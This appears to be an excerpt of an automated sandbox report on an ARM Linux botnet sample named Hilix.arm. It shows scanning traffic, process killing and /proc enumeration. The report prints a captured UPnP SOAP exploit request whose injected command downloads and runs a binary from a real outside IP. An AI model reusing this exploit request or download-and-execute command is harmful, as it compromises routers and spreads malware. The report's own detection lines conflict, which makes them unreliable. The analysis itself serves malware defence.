Source: global traffic	TCP traffic: 192.168.2.23:55795 -> 91.254.255.131:52869
Source: global traffic	TCP traffic: 192.168.2.23:55795 -> 45.220.17.34:52869
Source: global traffic	TCP traffic: 192.168.2.23:55795 -> 185.38.140.115:52869
Source: global traffic	TCP traffic: 192.168.2.23:55795 -> 91.145.78.149:52869
Source: global traffic	TCP traffic: 192.168.2.23:55795 -> 185.253.24.184:52869
Source: global traffic	TCP traffic: 192.168.2.23:55795 -> 45.126.81.249:52869
Source: global traffic	TCP traffic: 192.168.2.23:55795 -> 45.249.46.81:52869
Source: global traffic	TCP traffic: 192.168.2.23:55795 -> 185.70.60.184:52869
Source: global traffic	TCP traffic: 192.168.2.23:55795 -> 185.193.71.208:52869
Source: global traffic	TCP traffic: 192.168.2.23:55795 -> 45.249.115.113:52869
Source: global traffic	TCP traffic: 192.168.2.23:55795 -> 91.161.236.18:52869
Source: global traffic	TCP traffic: 192.168.2.23:55795 -> 91.74.211.165:52869
Source: global traffic	TCP traffic: 192.168.2.23:55795 -> 45.31.18.135:52869
Source: global traffic	TCP traffic: 192.168.2.23:55795 -> 185.187.35.77:52869
Source: global traffic	TCP traffic: 192.168.2.23:55795 -> 91.157.185.141:52869
Source: global traffic	TCP traffic: 192.168.2.23:55795 -> 45.69.80.135:52869
Source: global traffic	TCP traffic: 192.168.2.23:55795 -> 185.143.203.6:52869
Source: global traffic	TCP traffic: 192.168.2.23:55795 -> 45.228.176.251:52869
Source: global traffic	TCP traffic: 192.168.2.23:55795 -> 45.74.190.92:52869
Source: global traffic	TCP traffic: 192.168.2.23:55795 -> 45.224.201.136:52869
Source: global traffic	TCP traffic: 192.168.2.23:55795 -> 185.123.92.109:52869
Source: global traffic	TCP traffic: 192.168.2.23:55795 -> 91.63.82.80:52869
Source: global traffic	TCP traffic: 192.168.2.23:55795 -> 91.197.92.117:52869
Source: global traffic	TCP traffic: 192.168.2.23:55795 -> 45.47.171.122:52869
Source: global traffic	TCP traffic: 192.168.2.23:55795 -> 91.81.176.75:52869
Source: global traffic	TCP traffic: 192.168.2.23:55795 -> 185.204.220.216:52869
Source: global traffic	TCP traffic: 192.168.2.23:55795 -> 91.2.70.137:52869
Source: global traffic	TCP traffic: 192.168.2.23:55795 -> 91.93.238.51:52869
Source: global traffic	TCP traffic: 192.168.2.23:55795 -> 45.91.90.190:52869
Source: global traffic	TCP traffic: 192.168.2.23:55795 -> 185.205.241.35:52869
Source: global traffic	TCP traffic: 192.168.2.23:55795 -> 185.24.86.75:52869
Source: global traffic	TCP traffic: 192.168.2.23:55795 -> 91.189.166.198:52869
Source: global traffic	TCP traffic: 192.168.2.23:55795 -> 45.161.230.254:52869
Source: global traffic	TCP traffic: 192.168.2.23:55795 -> 45.23.191.179:52869
Source: global traffic	TCP traffic: 192.168.2.23:55795 -> 45.53.15.45:52869

Source: /tmp/Hilix.arm (PID: 5246)	Socket: 0.0.0.0::0
Source: /tmp/Hilix.arm (PID: 5246)	Socket: 0.0.0.0::53413
Source: /tmp/Hilix.arm (PID: 5246)	Socket: 0.0.0.0::80
Source: /tmp/Hilix.arm (PID: 5246)	Socket: 0.0.0.0::37215
Source: /tmp/Hilix.arm (PID: 5252)	Socket: 0.0.0.0::0
Source: /tmp/Hilix.arm (PID: 5252)	Socket: 0.0.0.0::53413
Source: /tmp/Hilix.arm (PID: 5252)	Socket: 0.0.0.0::80
Source: /tmp/Hilix.arm (PID: 5252)	Socket: 0.0.0.0::37215
Source: /usr/sbin/sshd (PID: 5290)	Socket: 0.0.0.0::22
Source: /usr/sbin/sshd (PID: 5290)	Socket: [::]::22
Source: /usr/sbin/sshd (PID: 5405)	Socket: 0.0.0.0::22
Source: /usr/sbin/sshd (PID: 5405)	Socket: [::]::22
Source: /usr/sbin/sshd (PID: 5409)	Socket: 0.0.0.0::22
Source: /usr/sbin/sshd (PID: 5409)	Socket: [::]::22

Source: unknown	Network traffic detected: HTTP traffic on port 43928 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 42836 -> 443

Source: unknown	TCP traffic detected without corresponding DNS query: 185.76.255.51
Source: unknown	TCP traffic detected without corresponding DNS query: 130.107.169.55
Source: unknown	TCP traffic detected without corresponding DNS query: 99.40.204.55
Source: unknown	TCP traffic detected without corresponding DNS query: 99.249.102.54
Source: unknown	TCP traffic detected without corresponding DNS query: 198.240.159.175
Source: unknown	TCP traffic detected without corresponding DNS query: 47.111.154.51
Source: unknown	TCP traffic detected without corresponding DNS query: 206.190.187.173
Source: unknown	TCP traffic detected without corresponding DNS query: 207.73.204.91
Source: unknown	TCP traffic detected without corresponding DNS query: 178.22.94.37
Source: unknown	TCP traffic detected without corresponding DNS query: 72.89.198.59
Source: unknown	TCP traffic detected without corresponding DNS query: 87.109.145.122
Source: unknown	TCP traffic detected without corresponding DNS query: 111.123.168.204
Source: unknown	TCP traffic detected without corresponding DNS query: 205.158.216.218
Source: unknown	TCP traffic detected without corresponding DNS query: 90.236.105.87
Source: unknown	TCP traffic detected without corresponding DNS query: 68.17.237.89
Source: unknown	TCP traffic detected without corresponding DNS query: 90.175.99.196
Source: unknown	TCP traffic detected without corresponding DNS query: 201.249.219.84
Source: unknown	TCP traffic detected without corresponding DNS query: 76.153.162.22
Source: unknown	TCP traffic detected without corresponding DNS query: 144.115.24.118
Source: unknown	TCP traffic detected without corresponding DNS query: 172.131.131.149
Source: unknown	TCP traffic detected without corresponding DNS query: 186.227.221.235
Source: unknown	TCP traffic detected without corresponding DNS query: 211.247.213.135
Source: unknown	TCP traffic detected without corresponding DNS query: 94.246.130.177
Source: unknown	TCP traffic detected without corresponding DNS query: 94.87.126.146
Source: unknown	TCP traffic detected without corresponding DNS query: 136.117.212.181
Source: unknown	TCP traffic detected without corresponding DNS query: 70.111.187.139
Source: unknown	TCP traffic detected without corresponding DNS query: 25.151.1.67
Source: unknown	TCP traffic detected without corresponding DNS query: 101.47.81.22
Source: unknown	TCP traffic detected without corresponding DNS query: 189.33.223.115
Source: unknown	TCP traffic detected without corresponding DNS query: 180.20.33.84
Source: unknown	TCP traffic detected without corresponding DNS query: 101.220.60.178
Source: unknown	TCP traffic detected without corresponding DNS query: 91.225.175.161
Source: unknown	TCP traffic detected without corresponding DNS query: 140.121.105.248
Source: unknown	TCP traffic detected without corresponding DNS query: 179.130.250.23
Source: unknown	TCP traffic detected without corresponding DNS query: 94.178.137.80
Source: unknown	TCP traffic detected without corresponding DNS query: 206.79.248.139
Source: unknown	TCP traffic detected without corresponding DNS query: 192.119.104.193
Source: unknown	TCP traffic detected without corresponding DNS query: 106.48.18.132
Source: unknown	TCP traffic detected without corresponding DNS query: 167.67.17.20
Source: unknown	TCP traffic detected without corresponding DNS query: 119.0.43.124
Source: unknown	TCP traffic detected without corresponding DNS query: 61.105.100.27
Source: unknown	TCP traffic detected without corresponding DNS query: 160.169.168.12
Source: unknown	TCP traffic detected without corresponding DNS query: 208.171.231.169
Source: unknown	TCP traffic detected without corresponding DNS query: 139.38.50.3
Source: unknown	TCP traffic detected without corresponding DNS query: 130.49.43.226
Source: unknown	TCP traffic detected without corresponding DNS query: 97.251.125.56
Source: unknown	TCP traffic detected without corresponding DNS query: 105.222.81.117
Source: unknown	TCP traffic detected without corresponding DNS query: 140.213.57.236
Source: unknown	TCP traffic detected without corresponding DNS query: 35.184.212.252
Source: unknown	TCP traffic detected without corresponding DNS query: 209.209.33.198

Source: Hilix.arm, 5244.1.00000000faa5f514.000000004dd08095.r-x.sdmp	String found in binary or memory: http://37.0.9.202/bins/Hilix.mips
Source: Hilix.arm, 5244.1.00000000faa5f514.000000004dd08095.r-x.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: Hilix.arm, 5244.1.00000000faa5f514.000000004dd08095.r-x.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/

Source: unknown

HTTP traffic detected: POST /picdesc.xml HTTP/1.1Host: 127.0.0.1:52869Content-Length: 630Accept-Encoding: gzip, deflateSOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMappingAccept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)Connection: keep-aliveData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 49 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 2f 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 34 37 34 35 31 3c 2f 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 34 34 33 38 32 3c 2f 4e 65 77 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 60 63 64 20 2f 76 61 72 3b 20 72 6d 20 2d 72 66 20 6e 69 67 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 33 37 2e 30 2e 39 2e 32 30 32 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 20 2d 4f 20 6e 69 67 3b 20 63 68 6d 6f 64 20 37 37 37 20 6e 69 67 3b 20 2e 2f 6e 69 67 20 72 65 61 6c 74 65 6b 60 3c 2f 4e 65 77 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 4e 65 77 45 6e 61 62 6c 65 64 3e 31 3c 2f 4e 65 77 45 6e 61 62 6c 65 64 3e 3c 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 73 79 6e 63 74 68 69 6e 67 3c 2f 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 30 3c 2f 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 3c 2f 75 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47451</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`cd /var; rm -rf nig; wget http://37.0.9.202/bins/Hilix.mips -O nig; chmod 777 nig; ./nig realtek`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></

System Summary:

Sample tries to kill many processes (SIGKILL)

Show sources

Source: /tmp/Hilix.arm (PID: 5246)	SIGKILL sent: pid: 5252, result: successful
Source: /tmp/Hilix.arm (PID: 5246)	SIGKILL sent: pid: 720, result: successful
Source: /tmp/Hilix.arm (PID: 5246)	SIGKILL sent: pid: 759, result: successful
Source: /tmp/Hilix.arm (PID: 5246)	SIGKILL sent: pid: 788, result: successful
Source: /tmp/Hilix.arm (PID: 5246)	SIGKILL sent: pid: 800, result: successful
Source: /tmp/Hilix.arm (PID: 5246)	SIGKILL sent: pid: 847, result: successful
Source: /tmp/Hilix.arm (PID: 5246)	SIGKILL sent: pid: 884, result: successful
Source: /tmp/Hilix.arm (PID: 5246)	SIGKILL sent: pid: 1334, result: successful
Source: /tmp/Hilix.arm (PID: 5246)	SIGKILL sent: pid: 1335, result: successful
Source: /tmp/Hilix.arm (PID: 5246)	SIGKILL sent: pid: 1872, result: successful
Source: /tmp/Hilix.arm (PID: 5246)	SIGKILL sent: pid: 2096, result: successful
Source: /tmp/Hilix.arm (PID: 5246)	SIGKILL sent: pid: 2097, result: successful
Source: /tmp/Hilix.arm (PID: 5246)	SIGKILL sent: pid: 2102, result: successful
Source: /tmp/Hilix.arm (PID: 5246)	SIGKILL sent: pid: 2180, result: successful
Source: /tmp/Hilix.arm (PID: 5246)	SIGKILL sent: pid: 2191, result: successful
Source: /tmp/Hilix.arm (PID: 5246)	SIGKILL sent: pid: 2208, result: successful
Source: /tmp/Hilix.arm (PID: 5246)	SIGKILL sent: pid: 2275, result: successful
Source: /tmp/Hilix.arm (PID: 5246)	SIGKILL sent: pid: 2281, result: successful
Source: /tmp/Hilix.arm (PID: 5246)	SIGKILL sent: pid: 2285, result: successful
Source: /tmp/Hilix.arm (PID: 5246)	SIGKILL sent: pid: 2289, result: successful
Source: /tmp/Hilix.arm (PID: 5246)	SIGKILL sent: pid: 2294, result: successful
Source: /tmp/Hilix.arm (PID: 5246)	SIGKILL sent: pid: 5248, result: successful
Source: /tmp/Hilix.arm (PID: 5246)	SIGKILL sent: pid: 5255, result: successful
Source: /tmp/Hilix.arm (PID: 5246)	SIGKILL sent: pid: 5257, result: successful
Source: /tmp/Hilix.arm (PID: 5246)	SIGKILL sent: pid: 5260, result: successful
Source: /tmp/Hilix.arm (PID: 5246)	SIGKILL sent: pid: 5290, result: successful
Source: /tmp/Hilix.arm (PID: 5246)	SIGKILL sent: pid: 5405, result: successful
Source: /tmp/Hilix.arm (PID: 5246)	SIGKILL sent: pid: 5246, result: unknown
Source: /tmp/Hilix.arm (PID: 5252)	SIGKILL sent: pid: 936, result: successful

Source: ELF static info symbol of initial sample

.symtab present: no

Source: /tmp/Hilix.arm (PID: 5246)	SIGKILL sent: pid: 5252, result: successful
Source: /tmp/Hilix.arm (PID: 5246)	SIGKILL sent: pid: 720, result: successful
Source: /tmp/Hilix.arm (PID: 5246)	SIGKILL sent: pid: 759, result: successful
Source: /tmp/Hilix.arm (PID: 5246)	SIGKILL sent: pid: 788, result: successful
Source: /tmp/Hilix.arm (PID: 5246)	SIGKILL sent: pid: 800, result: successful
Source: /tmp/Hilix.arm (PID: 5246)	SIGKILL sent: pid: 847, result: successful
Source: /tmp/Hilix.arm (PID: 5246)	SIGKILL sent: pid: 884, result: successful
Source: /tmp/Hilix.arm (PID: 5246)	SIGKILL sent: pid: 1334, result: successful
Source: /tmp/Hilix.arm (PID: 5246)	SIGKILL sent: pid: 1335, result: successful
Source: /tmp/Hilix.arm (PID: 5246)	SIGKILL sent: pid: 1872, result: successful
Source: /tmp/Hilix.arm (PID: 5246)	SIGKILL sent: pid: 2096, result: successful
Source: /tmp/Hilix.arm (PID: 5246)	SIGKILL sent: pid: 2097, result: successful
Source: /tmp/Hilix.arm (PID: 5246)	SIGKILL sent: pid: 2102, result: successful
Source: /tmp/Hilix.arm (PID: 5246)	SIGKILL sent: pid: 2180, result: successful
Source: /tmp/Hilix.arm (PID: 5246)	SIGKILL sent: pid: 2191, result: successful
Source: /tmp/Hilix.arm (PID: 5246)	SIGKILL sent: pid: 2208, result: successful
Source: /tmp/Hilix.arm (PID: 5246)	SIGKILL sent: pid: 2275, result: successful
Source: /tmp/Hilix.arm (PID: 5246)	SIGKILL sent: pid: 2281, result: successful
Source: /tmp/Hilix.arm (PID: 5246)	SIGKILL sent: pid: 2285, result: successful
Source: /tmp/Hilix.arm (PID: 5246)	SIGKILL sent: pid: 2289, result: successful
Source: /tmp/Hilix.arm (PID: 5246)	SIGKILL sent: pid: 2294, result: successful
Source: /tmp/Hilix.arm (PID: 5246)	SIGKILL sent: pid: 5248, result: successful
Source: /tmp/Hilix.arm (PID: 5246)	SIGKILL sent: pid: 5255, result: successful
Source: /tmp/Hilix.arm (PID: 5246)	SIGKILL sent: pid: 5257, result: successful
Source: /tmp/Hilix.arm (PID: 5246)	SIGKILL sent: pid: 5260, result: successful
Source: /tmp/Hilix.arm (PID: 5246)	SIGKILL sent: pid: 5290, result: successful
Source: /tmp/Hilix.arm (PID: 5246)	SIGKILL sent: pid: 5405, result: successful
Source: /tmp/Hilix.arm (PID: 5246)	SIGKILL sent: pid: 5246, result: unknown
Source: /tmp/Hilix.arm (PID: 5252)	SIGKILL sent: pid: 936, result: successful

Source: classification engine

Classification label: mal76.spre.troj.linARM@0/6@0/0

Source: Hilix.arm

Joe Sandbox Cloud Basic: Detection: clean Score: 0

Perma Link

Source: /tmp/Hilix.arm (PID: 5252)	File opened: /proc/491/fd
Source: /tmp/Hilix.arm (PID: 5252)	File opened: /proc/793/fd
Source: /tmp/Hilix.arm (PID: 5252)	File opened: /proc/772/fd
Source: /tmp/Hilix.arm (PID: 5252)	File opened: /proc/796/fd
Source: /tmp/Hilix.arm (PID: 5252)	File opened: /proc/774/fd
Source: /tmp/Hilix.arm (PID: 5252)	File opened: /proc/797/fd
Source: /tmp/Hilix.arm (PID: 5252)	File opened: /proc/777/fd
Source: /tmp/Hilix.arm (PID: 5252)	File opened: /proc/799/fd
Source: /tmp/Hilix.arm (PID: 5252)	File opened: /proc/658/fd
Source: /tmp/Hilix.arm (PID: 5252)	File opened: /proc/912/fd
Source: /tmp/Hilix.arm (PID: 5252)	File opened: /proc/759/fd
Source: /tmp/Hilix.arm (PID: 5252)	File opened: /proc/936/fd
Source: /tmp/Hilix.arm (PID: 5252)	File opened: /proc/918/fd
Source: /tmp/Hilix.arm (PID: 5252)	File opened: /proc/1/fd
Source: /tmp/Hilix.arm (PID: 5252)	File opened: /proc/761/fd
Source: /tmp/Hilix.arm (PID: 5252)	File opened: /proc/785/fd
Source: /tmp/Hilix.arm (PID: 5252)	File opened: /proc/884/fd
Source: /tmp/Hilix.arm (PID: 5252)	File opened: /proc/720/fd
Source: /tmp/Hilix.arm (PID: 5252)	File opened: /proc/721/fd
Source: /tmp/Hilix.arm (PID: 5252)	File opened: /proc/788/fd
Source: /tmp/Hilix.arm (PID: 5252)	File opened: /proc/789/fd
Source: /tmp/Hilix.arm (PID: 5252)	File opened: /proc/800/fd
Source: /tmp/Hilix.arm (PID: 5252)	File opened: /proc/801/fd
Source: /tmp/Hilix.arm (PID: 5252)	File opened: /proc/847/fd
Source: /tmp/Hilix.arm (PID: 5252)	File opened: /proc/904/fd
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/5267/fd
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/5146/exe
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/5268/fd
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/5389/exe
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/1582/fd
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/1582/fd
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/1582/exe
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/1582/fd
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/1582/fd
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/3088/exe
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/5260/fd
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/5260/exe
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/1579/fd
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/1579/fd
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/1579/exe
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/1579/fd
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/1579/fd
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/1699/fd
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/1699/fd
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/1699/exe
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/1699/fd
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/1699/fd
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/1698/fd
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/1698/fd
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/1698/exe
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/1698/fd
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/1698/fd
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/1335/fd
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/1335/fd
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/1335/exe
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/1334/fd
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/1334/fd
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/1334/exe
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/1334/fd
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/1334/fd
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/1576/fd
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/1576/fd
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/1576/exe
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/1576/fd
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/1576/fd
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/2302/fd
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/2302/fd
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/2302/exe
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/2302/fd
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/2302/fd
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/910/exe
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/5259/exe
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/912/fd
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/912/fd
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/912/exe
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/912/fd
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/912/fd
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/5139/exe
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/2307/fd
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/2307/fd
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/2307/exe
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/2307/fd
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/2307/fd
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/918/fd
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/918/fd
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/918/exe
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/918/fd
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/918/fd
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/5272/fd
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/5151/exe
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/5273/fd
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/5274/fd
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/5275/fd
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/5154/exe
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/5276/fd
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/5277/fd
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/5036/fd
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/5036/fd
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/5278/fd
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/5279/fd
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/1594/fd
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/1594/fd
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/1594/exe
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/1594/fd
Source: /tmp/Hilix.arm (PID: 5246)	File opened: /proc/1594/fd

Hooking and other Techniques for Hiding and Protection:

Uses known network protocols on non-standard ports

Show sources

Source: unknown	Network traffic detected: HTTP traffic on port 42190 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42192 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42938 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42940 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52534 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41374 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37956 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47822 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 37998 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52534 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41374 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37998 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52534 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37998 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41374 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41988 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42370 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42376 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43734 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42000 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53188 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43734 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52534 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37998 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53188 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42808 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49774 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43734 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41374 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 38276 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42808 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49774 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53188 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 38276 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42808 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49774 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43734 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 38276 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37998 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52534 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42808 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53188 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49774 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41826 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 38276 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41374 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43734 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42808 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49774 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41826 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46844 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 38276 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53188 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37998 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46844 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52534 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41826 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43734 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42808 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49774 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59500 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46844 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59502 -> 52869
